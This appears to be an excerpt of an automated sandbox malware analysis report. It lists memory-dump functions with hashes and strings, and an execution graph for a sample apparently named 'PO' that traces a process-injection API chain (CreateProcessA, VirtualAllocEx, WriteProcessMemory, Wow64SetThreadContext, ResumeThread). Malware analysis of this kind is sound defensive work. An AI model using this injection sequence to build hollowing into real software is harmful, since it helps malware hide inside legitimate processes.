                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ObjectRelease$CapsDevice
                        • String ID: (
                        • API String ID: 1061551593-3887548279
                        • Opcode ID: 6562473f71bb9b5b01d01c9a1e3a8bcc335ceaa328a5ce6092db5b0a69b9b16b
                        • Instruction ID: 8cda80e2d849c4dfc1bd602282884adf38146848f21e3e652199043d4b5d8f6b
                        • Opcode Fuzzy Hash: 6562473f71bb9b5b01d01c9a1e3a8bcc335ceaa328a5ce6092db5b0a69b9b16b
                        • Instruction Fuzzy Hash: 2F61F4B1208355AFD210DF64C888E6BBBE9FF89744F10891DF59ACB260D671E905CB62
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _swprintf
                        • String ID: %ls$%s: %s
                        • API String ID: 589789837-2259941744
                        • Opcode ID: 565eae74809fe593c88f9e0b547239c62db4e9850a97b15dd515c3a4b9c00471
                        • Instruction ID: 3fa0807b67d1f8ebd4c9ace1c796ad3044cd6cfff87434230d1f722397884e66
                        • Opcode Fuzzy Hash: 565eae74809fe593c88f9e0b547239c62db4e9850a97b15dd515c3a4b9c00471
                        • Instruction Fuzzy Hash: 57516C31188F01F6E6292A918D47F757764AB04F88F20C417F3AE740E2D9E29A547B1B
                        APIs
                        • _free.LIBCMT ref: 00C8CBC0
                          • Part of subcall function 00C8AB31: IsProcessorFeaturePresent.KERNEL32(00000017,00C8AB20,0000002C,00C9C988,00C8DB5C,00000000,00000000,00C8B1A5,?,?,00C8AB2D,00000000,00000000,00000000,00000000,00000000), ref: 00C8AB33
                          • Part of subcall function 00C8AB31: GetCurrentProcess.KERNEL32(C0000417,00C9C988,0000002C,00C8A896,00000016,00C8B1A5), ref: 00C8AB55
                          • Part of subcall function 00C8AB31: TerminateProcess.KERNEL32(00000000), ref: 00C8AB5C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                        • String ID: *?$.
                        • API String ID: 2667617558-3972193922
                        • Opcode ID: 3a3d99b21c2538509487d73607efedee4e20e3b6303f82c4bdbaae18271d93fd
                        • Instruction ID: eaae16e5db3f5612e2b790a0a97ff4e5705bb6af0da057653fc18325fd5eed91
                        • Opcode Fuzzy Hash: 3a3d99b21c2538509487d73607efedee4e20e3b6303f82c4bdbaae18271d93fd
                        • Instruction Fuzzy Hash: F2519471E00109AFDF14EFA8C881ABDB7F5FF58318F24816AE954E7340E6359E019B64
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: UNC$\\?\
                        • API String ID: 0-253988292
                        • Opcode ID: 9b6c1600da655b3c72c42c7b4d32c18dba14fa12c5991b705c7b7d0b3c2b0ba5
                        • Instruction ID: 9d1015136bc7d6ec12edde38a434d57bb5d0e252c97ac044d506b996edc234f4
                        • Opcode Fuzzy Hash: 9b6c1600da655b3c72c42c7b4d32c18dba14fa12c5991b705c7b7d0b3c2b0ba5
                        • Instruction Fuzzy Hash: 6841A131500699AACF22AF61CC06EFE7F69BF05350F10C465F86CA3152DB759B91BBA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: Shell.Explorer$about:blank
                        • API String ID: 0-874089819
                        • Opcode ID: 3e559d64feacf9e38b3149015be5938ac721d0208bed0b13659502dc219b7d56
                        • Instruction ID: e3a2906de117e937b7bc6597706b7b48ad13495291f49f81922dfb0d4dc7fb4e
                        • Opcode Fuzzy Hash: 3e559d64feacf9e38b3149015be5938ac721d0208bed0b13659502dc219b7d56
                        • Instruction Fuzzy Hash: 6B218B75200706AFD708ABB1C895E2AB37ABF44360F14C62DF11A8B281CB62ED41DB90
                        APIs
                        • IsWindowVisible.USER32(00010476), ref: 00C80E42
                        • DialogBoxParamW.USER32(GETPASSWORD1,00010476,Function_0000E50A,?), ref: 00C80E7E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: DialogParamVisibleWindow
                        • String ID: GETPASSWORD1
                        • API String ID: 3157717868-3292211884
                        • Opcode ID: 40f6630d23bb196ffbaa8c6c88e7cd2e8bf0036f78df1a65f37ef1e245aace6a
                        • Instruction ID: c4c858dde93b35128ab02665ade7523204acb5e85693eac887d38ae3771780f6
                        • Opcode Fuzzy Hash: 40f6630d23bb196ffbaa8c6c88e7cd2e8bf0036f78df1a65f37ef1e245aace6a
                        • Instruction Fuzzy Hash: CC119B727002086ADF21EF34DC46BAF3388B705319F254079FD49AB181CAB04D84D7A8
                        APIs
                          • Part of subcall function 00C74C41: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C74C60
                          • Part of subcall function 00C74C41: GetProcAddress.KERNEL32(00CA6CA0,CryptUnprotectMemory), ref: 00C74C70
                        • GetCurrentProcessId.KERNEL32(?,?,?,00C74CBA), ref: 00C74D41
                        Strings
                        • CryptUnprotectMemory failed, xrefs: 00C74D39
                        • CryptProtectMemory failed, xrefs: 00C74D01
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AddressProc$CurrentProcess
                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                        • API String ID: 2190909847-396321323
                        • Opcode ID: 682ec06193ec08a96ee20d48df632dcb16f035f2393fa1e51912c9b6643e3ddc
                        • Instruction ID: c033ff97c95a61bcc59b921e88b2ce786065e5c37f3126b7022cf0f284e55ba9
                        • Opcode Fuzzy Hash: 682ec06193ec08a96ee20d48df632dcb16f035f2393fa1e51912c9b6643e3ddc
                        • Instruction Fuzzy Hash: 0A1171303012052BDF298B3DDC40B6E3799DFA1794B04C129F4988B191DF60DD418395
                        APIs
                          • Part of subcall function 00C73D4B: GetWindowRect.USER32(?,?), ref: 00C73D82
                          • Part of subcall function 00C73D4B: GetClientRect.USER32(?,?), ref: 00C73D8E
                          • Part of subcall function 00C73D4B: GetWindowLongW.USER32(?,000000F0), ref: 00C73E2F
                          • Part of subcall function 00C73D4B: GetWindowRect.USER32(?,?), ref: 00C73E5C
                          • Part of subcall function 00C73D4B: GetWindowTextW.USER32(?,?,00000400), ref: 00C73E7B
                        • GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                        • SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Window$Rect$Text$ClientItemLong
                        • String ID: 0
                        • API String ID: 660763476-4108050209
                        • Opcode ID: 4c70a2951676bd25e644d7d7f860405bf0e843b81ac70a73136afb7c4190e800
                        • Instruction ID: 97fd322e095bed615853b77b5a9618ffcf62bdfc0b0e6841a6918b1be7418c0c
                        • Opcode Fuzzy Hash: 4c70a2951676bd25e644d7d7f860405bf0e843b81ac70a73136afb7c4190e800
                        • Instruction Fuzzy Hash: 7EF06970100289A7DF151FE5C80DBED3B9EAB1430AF88C028FE5C981A1CB748B99EA10
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _swprintf
                        • String ID: z%s%02d$z%s%d
                        • API String ID: 589789837-468824935
                        • Opcode ID: 139c372b7449e5f75378416fe0a262c87bde7d52015d3ac6be3b52a47fdd684c
                        • Instruction ID: b8cf1dcb91d75a5bdf9ad1f943020e48c33c938c0e58c2cf55aff51517e8b9f7
                        • Opcode Fuzzy Hash: 139c372b7449e5f75378416fe0a262c87bde7d52015d3ac6be3b52a47fdd684c
                        • Instruction Fuzzy Hash: C7F0CDB050460CABDF019E40CC46CADB719FB48300F00C261FE185A262E6719A14A7A0

                        Execution Graph

                        Execution Coverage:11%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:213
                        Total number of Limit Nodes:6
                        execution_graph 38747 17150b0 38748 17150c8 38747->38748 38758 1714ca0 38748->38758 38750 17150cf 38751 17159a6 38750->38751 38752 171594a 38750->38752 38757 1715295 38750->38757 38766 1714d08 38751->38766 38762 1714ce8 38752->38762 38755 1715965 38756 1715a1d 38759 1714cab 38758->38759 38760 1714ce8 2 API calls 38759->38760 38761 1715965 38760->38761 38761->38750 38763 1714cf3 38762->38763 38764 1714d08 2 API calls 38763->38764 38765 1715a1d 38764->38765 38765->38755 38767 1714d13 38766->38767 38770 1714d38 38767->38770 38769 1715afa 38769->38756 38771 1714d43 38770->38771 38774 1714d68 38771->38774 38773 1715bfc 38773->38769 38775 1714d73 38774->38775 38776 171899b 38775->38776 38778 171b240 38775->38778 38776->38773 38782 171b278 38778->38782 38785 171b268 38778->38785 38779 171b256 38779->38776 38789 171b360 38782->38789 38783 171b287 38783->38779 38786 171b278 38785->38786 38788 171b360 2 API calls 38786->38788 38787 171b287 38787->38779 38788->38787 38790 171b381 38789->38790 38791 171b3a4 38789->38791 38790->38791 38797 171b5f8 38790->38797 38801 171b608 38790->38801 38791->38783 38792 171b5bd GetModuleHandleW 38794 171b5d5 38792->38794 38793 171b39c 38793->38791 38793->38792 38794->38783 38798 171b61c 38797->38798 38799 171b641 38798->38799 38805 171adf8 38798->38805 38799->38793 38802 171b61c 38801->38802 38803 171b641 38802->38803 38804 171adf8 LoadLibraryExW 38802->38804 38803->38793 38804->38803 38807 171b7c8 LoadLibraryExW 38805->38807 38808 171b841 38807->38808 38808->38799 38809 74dccbb 38810 74dcb92 38809->38810 38811 74dcbfc 38809->38811 38811->38810 38815 74df948 38811->38815 38834 74df9b6 38811->38834 38854 74df958 38811->38854 38816 74df958 38815->38816 38827 74df996 38816->38827 38873 a7202d0 38816->38873 38878 a72062d 38816->38878 38883 a72068c 38816->38883 38887 a7203ec 38816->38887 38892 a720489 38816->38892 38897 a7204aa 38816->38897 38902 a72052a 38816->38902 38907 a720424 38816->38907 38911 a720246 38816->38911 38916 a720afe 38816->38916 38921 a720119 38816->38921 38929 a720258 38816->38929 38934 a720778 38816->38934 38939 a72083a 38816->38939 38944 a720476 38816->38944 38949 a720731 38816->38949 38827->38811 38835 74df944 38834->38835 38836 74df9b9 38834->38836 38837 a7202d0 2 API calls 38835->38837 38838 a720731 2 API calls 38835->38838 38839 a720476 2 API calls 38835->38839 38840 74df996 38835->38840 38841 a72083a 2 API calls 38835->38841 38842 a720778 2 API calls 38835->38842 38843 a720258 2 API calls 38835->38843 38844 a720119 4 API calls 38835->38844 38845 a720afe 2 API calls 38835->38845 38846 a720246 2 API calls 38835->38846 38847 a720424 2 API calls 38835->38847 38848 a72052a 2 API calls 38835->38848 38849 a7204aa 2 API calls 38835->38849 38850 a720489 2 API calls 38835->38850 38851 a7203ec 2 API calls 38835->38851 38852 a72068c 2 API calls 38835->38852 38853 a72062d 2 API calls 38835->38853 38836->38811 38837->38840 38838->38840 38839->38840 38840->38811 38841->38840 38842->38840 38843->38840 38844->38840 38845->38840 38846->38840 38847->38840 38848->38840 38849->38840 38850->38840 38851->38840 38852->38840 38853->38840 38855 74df972 38854->38855 38856 a7202d0 2 API calls 38855->38856 38857 a720731 2 API calls 38855->38857 38858 a720476 2 API calls 38855->38858 38859 a72083a 2 API calls 38855->38859 38860 a720778 2 API calls 38855->38860 38861 a720258 2 API calls 38855->38861 38862 a720119 4 API calls 38855->38862 38863 a720afe 2 API calls 38855->38863 38864 a720246 2 API calls 38855->38864 38865 a720424 2 API calls 38855->38865 38866 74df996 38855->38866 38867 a72052a 2 API calls 38855->38867 38868 a7204aa 2 API calls 38855->38868 38869 a720489 2 API calls 38855->38869 38870 a7203ec 2 API calls 38855->38870 38871 a72068c 2 API calls 38855->38871 38872 a72062d 2 API calls 38855->38872 38856->38866 38857->38866 38858->38866 38859->38866 38860->38866 38861->38866 38862->38866 38863->38866 38864->38866 38865->38866 38866->38811 38867->38866 38868->38866 38869->38866 38870->38866 38871->38866 38872->38866 38874 a7202f1 38873->38874 38954 74dc428 38874->38954 38958 74dc430 38874->38958 38875 a720a5f 38879 a72064c 38878->38879 38962 74dc4e8 38879->38962 38966 74dc4f0 38879->38966 38880 a720b3a 38970 74dbae8 38883->38970 38974 74dbae0 38883->38974 38884 a7206a6 38888 a7202f1 38887->38888 38890 74dc428 VirtualAllocEx 38888->38890 38891 74dc430 VirtualAllocEx 38888->38891 38889 a720a5f 38890->38889 38891->38889 38893 a720492 38892->38893 38895 74dc4e8 WriteProcessMemory 38893->38895 38896 74dc4f0 WriteProcessMemory 38893->38896 38894 a720560 38895->38894 38896->38894 38898 a72026f 38897->38898 38899 a720284 38897->38899 38978 74dba38 38898->38978 38982 74dba30 38898->38982 38899->38827 38903 a72053c 38902->38903 38905 74dc4e8 WriteProcessMemory 38903->38905 38906 74dc4f0 WriteProcessMemory 38903->38906 38904 a720560 38905->38904 38906->38904 38909 74dc4e8 WriteProcessMemory 38907->38909 38910 74dc4f0 WriteProcessMemory 38907->38910 38908 a7203e0 38908->38827 38909->38908 38910->38908 38912 a72022d 38911->38912 38912->38911 38913 a72023f 38912->38913 38914 74dbae8 Wow64SetThreadContext 38912->38914 38915 74dbae0 Wow64SetThreadContext 38912->38915 38913->38827 38914->38912 38915->38912 38917 a720b04 38916->38917 38919 74dc4e8 WriteProcessMemory 38917->38919 38920 74dc4f0 WriteProcessMemory 38917->38920 38918 a720b3a 38919->38918 38920->38918 38922 a720148 38921->38922 38986 74dc778 38922->38986 38990 74dc76c 38922->38990 38930 a72025e 38929->38930 38932 74dba38 ResumeThread 38930->38932 38933 74dba30 ResumeThread 38930->38933 38931 a720284 38931->38827 38932->38931 38933->38931 38935 a72077e 38934->38935 38994 74dc5d8 38935->38994 38998 74dc5e0 38935->38998 38936 a7207a1 38936->38827 38940 a720857 38939->38940 38942 74dc428 VirtualAllocEx 38940->38942 38943 74dc430 VirtualAllocEx 38940->38943 38941 a720a5f 38942->38941 38943->38941 38945 a7202f1 38944->38945 38947 74dc428 VirtualAllocEx 38945->38947 38948 74dc430 VirtualAllocEx 38945->38948 38946 a720a5f 38947->38946 38948->38946 38950 a72068b 38949->38950 38952 74dbae8 Wow64SetThreadContext 38950->38952 38953 74dbae0 Wow64SetThreadContext 38950->38953 38951 a7206a6 38952->38951 38953->38951 38955 74dc430 VirtualAllocEx 38954->38955 38957 74dc4ad 38955->38957 38957->38875 38959 74dc470 VirtualAllocEx 38958->38959 38961 74dc4ad 38959->38961 38961->38875 38963 74dc4f0 WriteProcessMemory 38962->38963 38965 74dc58f 38963->38965 38965->38880 38967 74dc538 WriteProcessMemory 38966->38967 38969 74dc58f 38967->38969 38969->38880 38971 74dbb2d Wow64SetThreadContext 38970->38971 38973 74dbb75 38971->38973 38973->38884 38975 74dbae8 Wow64SetThreadContext 38974->38975 38977 74dbb75 38975->38977 38977->38884 38979 74dba78 ResumeThread 38978->38979 38981 74dbaa9 38979->38981 38981->38899 38983 74dba38 ResumeThread 38982->38983 38985 74dbaa9 38983->38985 38985->38899 38987 74dc801 CreateProcessA 38986->38987 38989 74dc9c3 38987->38989 38991 74dc778 CreateProcessA 38990->38991 38993 74dc9c3 38991->38993 38995 74dc5e0 ReadProcessMemory 38994->38995 38997 74dc66f 38995->38997 38997->38936 38999 74dc62b ReadProcessMemory 38998->38999 39001 74dc66f 38999->39001 39001->38936 39002 560bbd8 39003 560bbee 39002->39003 39010 560be99 39003->39010 39004 560bbf8 39014 560b90c 39004->39014 39006 560bc22 39007 560b90c 2 API calls 39006->39007 39008 560bc54 39007->39008 39011 560beda 39010->39011 39012 560b90c 2 API calls 39011->39012 39013 560bee3 39012->39013 39013->39004 39015 560b917 39014->39015 39018 1714d68 2 API calls 39015->39018 39019 17186d8 39015->39019 39016 560bf90 39016->39006 39018->39016 39020 17186db 39019->39020 39021 171899b 39020->39021 39022 171b240 2 API calls 39020->39022 39021->39016 39022->39021
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42ecd1fb5ad2fbe7a141f0748159f1ee0c30bb5464349ba8921a4c19445bc45f
                        • Instruction ID: f36eb4c99e2ee9462b7f2cab5949d67db3609220430810f319b709db5ea3c8e4
                        • Opcode Fuzzy Hash: 42ecd1fb5ad2fbe7a141f0748159f1ee0c30bb5464349ba8921a4c19445bc45f
                        • Instruction Fuzzy Hash: 2AD052B8C09228CFC720DF50C8505F8F7B8BB0E324F0062AAC44AA7222E7308C55CF24

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1038 74dc76c-74dc80d 1041 74dc80f-74dc819 1038->1041 1042 74dc846-74dc866 1038->1042 1041->1042 1043 74dc81b-74dc81d 1041->1043 1047 74dc89f-74dc8ce 1042->1047 1048 74dc868-74dc872 1042->1048 1044 74dc81f-74dc829 1043->1044 1045 74dc840-74dc843 1043->1045 1049 74dc82d-74dc83c 1044->1049 1050 74dc82b 1044->1050 1045->1042 1058 74dc907-74dc9c1 CreateProcessA 1047->1058 1059 74dc8d0-74dc8da 1047->1059 1048->1047 1051 74dc874-74dc876 1048->1051 1049->1049 1052 74dc83e 1049->1052 1050->1049 1053 74dc899-74dc89c 1051->1053 1054 74dc878-74dc882 1051->1054 1052->1045 1053->1047 1056 74dc884 1054->1056 1057 74dc886-74dc895 1054->1057 1056->1057 1057->1057 1060 74dc897 1057->1060 1070 74dc9ca-74dca50 1058->1070 1071 74dc9c3-74dc9c9 1058->1071 1059->1058 1061 74dc8dc-74dc8de 1059->1061 1060->1053 1063 74dc901-74dc904 1061->1063 1064 74dc8e0-74dc8ea 1061->1064 1063->1058 1065 74dc8ec 1064->1065 1066 74dc8ee-74dc8fd 1064->1066 1065->1066 1066->1066 1068 74dc8ff 1066->1068 1068->1063 1081 74dca60-74dca64 1070->1081 1082 74dca52-74dca56 1070->1082 1071->1070 1084 74dca74-74dca78 1081->1084 1085 74dca66-74dca6a 1081->1085 1082->1081 1083 74dca58 1082->1083 1083->1081 1087 74dca88-74dca8c 1084->1087 1088 74dca7a-74dca7e 1084->1088 1085->1084 1086 74dca6c 1085->1086 1086->1084 1090 74dca9e-74dcaa5 1087->1090 1091 74dca8e-74dca94 1087->1091 1088->1087 1089 74dca80 1088->1089 1089->1087 1092 74dcabc 1090->1092 1093 74dcaa7-74dcab6 1090->1093 1091->1090 1095 74dcabd 1092->1095 1093->1092 1095->1095
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074DC9AE
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: ead12e19f55ba28323bd9b122fbbe13cbdf6bcc7f1be25e95811c725139066cb
                        • Instruction ID: e416eba974b73fa24e3acd0abe4e3e8aa1fb25639ed30f87508e59439593a18b
                        • Opcode Fuzzy Hash: ead12e19f55ba28323bd9b122fbbe13cbdf6bcc7f1be25e95811c725139066cb
                        • Instruction Fuzzy Hash: 13A15DB1D0021ACFDB10CF68C991BDEBBB2BF49314F14856AE859A7240DB749985CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1096 74dc778-74dc80d 1098 74dc80f-74dc819 1096->1098 1099 74dc846-74dc866 1096->1099 1098->1099 1100 74dc81b-74dc81d 1098->1100 1104 74dc89f-74dc8ce 1099->1104 1105 74dc868-74dc872 1099->1105 1101 74dc81f-74dc829 1100->1101 1102 74dc840-74dc843 1100->1102 1106 74dc82d-74dc83c 1101->1106 1107 74dc82b 1101->1107 1102->1099 1115 74dc907-74dc9c1 CreateProcessA 1104->1115 1116 74dc8d0-74dc8da 1104->1116 1105->1104 1108 74dc874-74dc876 1105->1108 1106->1106 1109 74dc83e 1106->1109 1107->1106 1110 74dc899-74dc89c 1108->1110 1111 74dc878-74dc882 1108->1111 1109->1102 1110->1104 1113 74dc884 1111->1113 1114 74dc886-74dc895 1111->1114 1113->1114 1114->1114 1117 74dc897 1114->1117 1127 74dc9ca-74dca50 1115->1127 1128 74dc9c3-74dc9c9 1115->1128 1116->1115 1118 74dc8dc-74dc8de 1116->1118 1117->1110 1120 74dc901-74dc904 1118->1120 1121 74dc8e0-74dc8ea 1118->1121 1120->1115 1122 74dc8ec 1121->1122 1123 74dc8ee-74dc8fd 1121->1123 1122->1123 1123->1123 1125 74dc8ff 1123->1125 1125->1120 1138 74dca60-74dca64 1127->1138 1139 74dca52-74dca56 1127->1139 1128->1127 1141 74dca74-74dca78 1138->1141 1142 74dca66-74dca6a 1138->1142 1139->1138 1140 74dca58 1139->1140 1140->1138 1144 74dca88-74dca8c 1141->1144 1145 74dca7a-74dca7e 1141->1145 1142->1141 1143 74dca6c 1142->1143 1143->1141 1147 74dca9e-74dcaa5 1144->1147 1148 74dca8e-74dca94 1144->1148 1145->1144 1146 74dca80 1145->1146 1146->1144 1149 74dcabc 1147->1149 1150 74dcaa7-74dcab6 1147->1150 1148->1147 1152 74dcabd 1149->1152 1150->1149 1152->1152
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074DC9AE
                        Memory Dump Source
                        • Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_74d0000_PO.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: fa51e22a4112e7eb30ab11370c671dc4634fc8474325bbb5d42cafa07a4e917a
                        • Instruction ID: 5d7896864d590b4b734dd7dfa4cd11b29de0077cfe72fabf14e96b9f14adeb64
